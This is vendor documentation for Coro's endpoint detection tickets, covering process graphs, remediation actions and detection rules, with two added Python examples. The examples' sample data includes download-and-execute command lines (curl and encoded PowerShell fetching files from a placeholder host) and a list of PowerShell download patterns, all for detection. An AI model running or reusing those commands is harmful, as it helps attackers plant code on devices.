Ticket types for Endpoint Detection and Response (EDR)
Important
The tickets discussed in this article apply to devices running Windows or macOS Agents.
Coro detects malicious processes and creates tickets based on its malicious process detection rules.
EDR ticket components
EDR tickets contain the following components:
- Description : The EDR ticket detection rule. Select See more to view a description of the detection rule that triggered the creation of the EDR ticket. Coro displays the detection rule description.
- Process : The name of the process executable file that triggered the creation of the EDR ticket.
- Hash : The hash value that uniquely identifies the process.
- Affected devices : Select the displayed device count to open the Devices page filtered to the devices affected by the EDR ticket.
- Mitre : This section lists specific techniques and tactics from the MITRE ATT&CK framework associated with the security incident. Each entry includes the tactic category and a detailed technique description. Select a technique ID to view detailed entries in the MITRE ATT&CK database and learn more about the security incident.
- Findings : This section displays additional details related to the process that triggered the creation of the EDR ticket. Coro lists execution times for the process and any related parent or child processes.
  Where available, use the View link to open a Process graph visualizer showing parent-child relationships for the associated process. For more information, see Process graph.
  note
  The process graph link exists only where Coro can access data to support the visualization. If the data is unavailable, the View link is hidden.
  Select the dropdown adjacent to each finding to view more details:
  - Command line : The full command used to start the process.
    note
    If the command line is base64 encoded, Coro automatically decodes and displays the text value.
  - Path : The directory path of the malicious process's image file.
Process graph
The process graph visually represents the process tree for the selected EDR ticket, highlighting both malicious and legitimate processes detected by Coro. Users can navigate through connected process nodes to explore parent and child processes, understand their relationships, and gather detailed information. This enables a quicker assessment of the investigated process to determine if it is malicious.
note
Coro supports process graphs for Windows and macOS devices.
The process graph is available only if Coro can access data for the selected process.
To view the process graph for an associated EDR ticket:
- Select the EDR ticket.
- Go to the Findings section, locate the process record, and select View under the Process graph header. Coro displays the process graph with the Anchor Process node selected.
Important
Coro designates the anchor process node as the process you selected from the Findings section of the selected EDR ticket.
The anchor process is the central node in the process graph. It links parent processes (showing all processes that led to the creation of the anchor process, starting from the root) to child processes (those initiated by the anchor process and its descendants). This provides a starting point for your investigation, enabling you to trace the lineage and impact of related processes.
Related process counters show the number of additional processes linked to the selected process node:
Process graph node properties
Each process graph node displays a set of properties.
Select a process node to see the following process properties:
- Related ticket : Select the link to go back to the related ticket.
- PID : The unique process identifier assigned by the operating system (OS).
- Related user : The user account that executed or interacted with the process.
- Execution Time : The timestamp when the process executed.
- Command Line Arguments : The full command used to start the process, including the path to the executable file and any passed arguments or parameters.
- Image file location : The process image directory path of the executable file that started the process.
- SHA256 Hash : The SHA-256 hash value of the selected process.
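The anchor-centred walk described above, as an added Python example that is not Coro's code: it builds a process tree from constructed telemetry whose fields follow the node properties just listed, then returns the root-to-anchor lineage, the descendants and the related-process counters. All PIDs, users, paths and digests are constructed placeholders.

```python
"""Added example, not Coro's own code: build a process tree from constructed
endpoint telemetry and walk it the way the Process graph view does, from the
anchor node up to its root and down to its descendants."""
from collections import deque
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcessNode:
    # Fields mirror the node properties listed above; all values are constructed.
    pid: int
    ppid: Optional[int]   # None for the root of the tree
    user: str
    exec_time: str        # ISO-8601, so lexical order is chronological order
    cmdline: str
    image: str
    sha256: str           # placeholder digests, not real file hashes


# Constructed sample telemetry for one device (hypothetical processes).
SAMPLE_EVENTS: List[ProcessNode] = [
    ProcessNode(4, None, "SYSTEM", "2024-01-01T08:00:00Z", "System", r"C:\Windows\System32\ntoskrnl.exe", "sha256-placeholder-0"),
    ProcessNode(812, 4, "SYSTEM", "2024-01-01T08:00:02Z", "winlogon.exe", r"C:\Windows\System32\winlogon.exe", "sha256-placeholder-1"),
    ProcessNode(900, 4, "SYSTEM", "2024-01-01T08:00:03Z", "svchost.exe -k netsvcs", r"C:\Windows\System32\svchost.exe", "sha256-placeholder-2"),
    ProcessNode(1200, 812, "CORP\\jdoe", "2024-01-01T08:01:00Z", "explorer.exe", r"C:\Windows\explorer.exe", "sha256-placeholder-3"),
    ProcessNode(2300, 1200, "CORP\\jdoe", "2024-01-01T09:15:00Z", "WINWORD.EXE /n invoice.docm", r"C:\Program Files\Office\WINWORD.EXE", "sha256-placeholder-4"),
    ProcessNode(2450, 2300, "CORP\\jdoe", "2024-01-01T09:15:07Z", "powershell.exe -NoProfile -File run.ps1", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "sha256-placeholder-5"),
    ProcessNode(2500, 2450, "CORP\\jdoe", "2024-01-01T09:15:08Z", "curl.exe -s https://example.invalid/a.bin -o a.bin", r"C:\Windows\System32\curl.exe", "sha256-placeholder-6"),
    ProcessNode(2510, 2450, "CORP\\jdoe", "2024-01-01T09:15:09Z", "cmd.exe /c whoami", r"C:\Windows\System32\cmd.exe", "sha256-placeholder-7"),
    ProcessNode(2600, 2510, "CORP\\jdoe", "2024-01-01T09:15:09Z", "whoami", r"C:\Windows\System32\whoami.exe", "sha256-placeholder-8"),
]

ProcessGraph = Tuple[Dict[int, ProcessNode], Dict[int, List[int]]]


def build_graph(events: List[ProcessNode]) -> ProcessGraph:
    """Index nodes by PID and record each parent's children in execution order."""
    by_pid = {e.pid: e for e in events}
    children: Dict[int, List[int]] = {}
    for e in sorted(events, key=lambda n: n.exec_time):
        if e.ppid is not None:
            children.setdefault(e.ppid, []).append(e.pid)
    return by_pid, children


def graph_available(graph: ProcessGraph, pid: int) -> bool:
    """Mirror the page's caveat: no graph unless telemetry exists for the process."""
    return pid in graph[0]


def lineage(graph: ProcessGraph, anchor_pid: int) -> List[int]:
    """PIDs from the root down to the anchor. Stops at the first parent missing
    from telemetry (an orphan) and guards against PPID cycles."""
    by_pid, _ = graph
    chain: List[int] = []
    seen = set()
    pid: Optional[int] = anchor_pid
    while pid is not None and pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = by_pid[pid].ppid
    chain.reverse()
    return chain


def descendants(graph: ProcessGraph, anchor_pid: int) -> List[int]:
    """Breadth-first list of every process started by the anchor or its descendants."""
    _, children = graph
    out: List[int] = []
    queue = deque(children.get(anchor_pid, []))
    seen = {anchor_pid}
    while queue:
        pid = queue.popleft()
        if pid in seen:
            continue
        seen.add(pid)
        out.append(pid)
        queue.extend(children.get(pid, []))
    return out


def related_counters(graph: ProcessGraph, anchor_pid: int) -> Dict[str, int]:
    """Counts shown beside the anchor: ancestors above it and descendants below it."""
    return {"parents": len(lineage(graph, anchor_pid)) - 1,
            "children": len(descendants(graph, anchor_pid))}


def render_tree(graph: ProcessGraph, root_pid: int, depth: int = 0) -> List[str]:
    """Indented text rendering of the subtree under root_pid (tree data, no cycles)."""
    by_pid, children = graph
    node = by_pid[root_pid]
    lines = [f"{'  ' * depth}[{node.pid}] {node.cmdline}  ({node.user}, {node.exec_time})"]
    for child in children.get(root_pid, []):
        lines.extend(render_tree(graph, child, depth + 1))
    return lines


if __name__ == "__main__":
    g = build_graph(SAMPLE_EVENTS)
    anchor = 2450  # the powershell.exe record selected from Findings
    print("lineage:", lineage(g, anchor))
    print("counters:", related_counters(g, anchor))
    print("\n".join(render_tree(g, lineage(g, anchor)[0])))
```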
Process graph actions
Each process node has actions you can perform. To access these actions, select Actions for the selected process node:
The table below describes the outcome of each process node action:
Action | Outcome |
---|---|
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Allow process | Prevents EDR tickets from triggering by marking the non-system process as safe. Related process information is not collected in the EDR Telemetry and Process tabs. |
EDR detection rules
Coro identifies malicious processes based on detection rules and creates tickets for detected events.
- Command and Control
- Credential Access
- Defense Evasion
- Discovery
- Execution
- Initial Access
- Persistence
- Privilege Escalation
Command and Control
Attackers use command and control techniques to control compromised devices, steal data, spread malware, or build botnets. They send commands and receive stolen data through command and control servers. Coro detects these activities and creates tickets for the following command and control rules:
Remote Access Tool Attack
Coro detects remote access tools on devices. Attackers often install and activate these tools covertly to gain unauthorized network access or expose private services. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Suspicious Usage of a LOLBin
Coro detects Living Off The Land Binaries (LOLBins) on devices. Attackers exploit these legitimate system tools to download or execute malicious activity while mimicking normal system processes. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Credential Access
Attackers use credential access techniques to steal or misuse login credentials and gain unauthorized access to data or devices. Coro detects these attempts and creates tickets for the following credential access rules:
- Brute force attempt using a non-existent username
- Repeated brute force attempts using wrong passwords
Brute force attempt using a non-existent username
Coro detects suspicious account activity on one or more devices. This activity suggests attempts to manipulate accounts or brute force user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Repeated brute force attempts using wrong passwords
Coro detects suspicious account activity on one or more devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials and potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Defense Evasion
Attackers use defense evasion techniques to avoid detection and bypass security mechanisms. Coro detects these attempts and creates tickets for the following defense evasion rules:
Malicious UAC Bypass
Coro detects User Account Control (UAC) bypasses on devices. Attackers use UAC bypass techniques to gain elevated system privileges. Coro keeps the tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Execution of a renamed tool
Coro detects renamed tools on devices. Attackers use this masquerading technique to avoid detection. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Discovery
Attackers use discovery techniques to gather information about the devices, networks, or infrastructure they’ve infiltrated. Coro detects these actions and creates tickets for the following discovery rules:
Unauthorized System Discovery Activity
Coro detects use of the whoami command on devices. Attackers often run this command during system discovery to identify user accounts and privileges. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Execution
Attackers use execution techniques to run malicious code on target devices or networks. Coro detects these attempts and creates tickets for the following execution rules:
- Suspicious Usage of a LOLBin
- Malicious File Download and/or Execution
- Malicious PowerShell Download from External Source
- Malicious Base64-Encoded PowerShell Command Usage
Malicious File Download and/or Execution
Coro detects use of curl commands on devices. Attackers often use curl to download and remotely execute payloads, enabling discreet transfer and execution of malicious files. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Malicious PowerShell Download from External Source
Coro detects PowerShell execution with signs of file download attempts on devices. Attackers often exploit PowerShell’s scripting capabilities to covertly download and execute malicious payloads. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Malicious Base64-Encoded PowerShell Command Usage
Coro detects Base64-encoded PowerShell commands on devices. Attackers often use Base64 encoding to hide malicious scripts from detection tools. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
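The decoding described in the note under Findings and the checks behind the Execution and Discovery rules above, as an added Python example that is not Coro's detection code: it decodes a PowerShell -EncodedCommand argument (base64 over UTF-16LE) and applies rule checks named after the page's rules to constructed command lines. The download indicator list, the .invalid hosts and the rule-to-tactic mapping are assumptions for illustration.

```python
"""Added example, not Coro's own detection code: decode base64-encoded
PowerShell command lines the way the Findings note describes, then apply
rule checks modelled on the page's Execution and Discovery rules to
constructed sample process events."""
import base64
import re
from typing import Dict, List, Optional

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell", "pwsh"}
# Assumed download indicators for the "PowerShell Download from External Source" check.
DOWNLOAD_PATTERN = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|"
    r"net\.webclient|invoke-restmethod|\birm\b", re.I)
URL_PATTERN = re.compile(r"https?://", re.I)


def _is_encoded_flag(token: str) -> bool:
    """True for the switch that introduces an encoded command. PowerShell accepts
    the documented aliases -e and -ec plus any unambiguous prefix of -EncodedCommand."""
    t = token.lower()
    return t in ("-e", "-ec") or (len(t) >= 3 and "-encodedcommand".startswith(t))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script text, or None when the command line carries no
    decodable encoded argument. The payload is base64 over UTF-16LE text."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_flag(tok):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except ValueError:  # bad base64 alphabet/padding, or an odd byte count
                return None
    return None


def image_name(cmdline: str) -> str:
    """Basename of the first token, lower-cased, with surrounding quotes stripped."""
    tokens = cmdline.split()
    if not tokens:
        return ""
    return tokens[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(cmdline: str) -> List[Dict[str, str]]:
    """Apply the rule checks; each hit names the page's rule and its tactic."""
    hits: List[Dict[str, str]] = []
    image = image_name(cmdline)
    decoded = decode_encoded_command(cmdline)
    # What an analyst would see: the raw line plus the decoded text, if any.
    visible = cmdline if decoded is None else f"{cmdline} {decoded}"
    if image in POWERSHELL_IMAGES:
        if decoded is not None:
            hits.append({"rule": "Malicious Base64-Encoded PowerShell Command Usage", "tactic": "Execution"})
        if DOWNLOAD_PATTERN.search(visible) and URL_PATTERN.search(visible):
            hits.append({"rule": "Malicious PowerShell Download from External Source", "tactic": "Execution"})
    elif image in ("curl.exe", "curl") and URL_PATTERN.search(cmdline):
        hits.append({"rule": "Malicious File Download and/or Execution", "tactic": "Execution"})
    elif image in ("whoami.exe", "whoami"):
        hits.append({"rule": "Unauthorized System Discovery Activity", "tactic": "Discovery"})
    return hits


def triage(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Findings-style records: the command line, its decoded text (if any) and rule hits."""
    return [{"cmdline": c, "decoded": decode_encoded_command(c), "rules": classify(c)} for c in cmdlines]


def _enc(script: str) -> str:
    """Used only to build the constructed sample: base64 over UTF-16LE, as PowerShell expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (hosts use the reserved .invalid TLD).
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -Command Get-Date",
    "powershell.exe -w hidden -enc " + _enc("Invoke-WebRequest https://example.invalid/p.ps1 -OutFile p.ps1"),
    "powershell.exe -enc not-base64!!",
    r"C:\Windows\System32\curl.exe -s https://example.invalid/a.bin -o a.bin",
    "whoami /all",
    "notepad.exe readme.txt",
]

if __name__ == "__main__":
    for rec in triage(SAMPLE_CMDLINES):
        print(rec["cmdline"][:60], "->", [h["rule"] for h in rec["rules"]] or "no hit")
```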
Initial Access
Attackers use initial access techniques to gain entry into a network or device. Coro detects these attempts and creates tickets for Remote Access Tool Attacks.
Persistence
Attackers use persistence techniques to maintain long-term control of a device or network, often stealthily. Coro detects these actions and creates tickets for the following persistence rules:
Malicious Scheduled Task Creation/Execution
Coro detects scheduled task creation or execution on devices, which might indicate that attackers are attempting to gain persistence or execute malicious code at predetermined times. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Modification of User Accounts in Elevated Groups
Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Password spray attack involving 200 login attempts
Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Password spray attack involving 100 login attempts
Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Privilege Escalation
Attackers use privilege escalation techniques to gain higher-level permissions on a device or network after initial access. Coro detects these attempts and creates tickets for the following privilege escalation events:
Elevated group adding and removal
Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
Action | Outcomes |
---|---|
Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block processes, and EDR Processes. |
Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |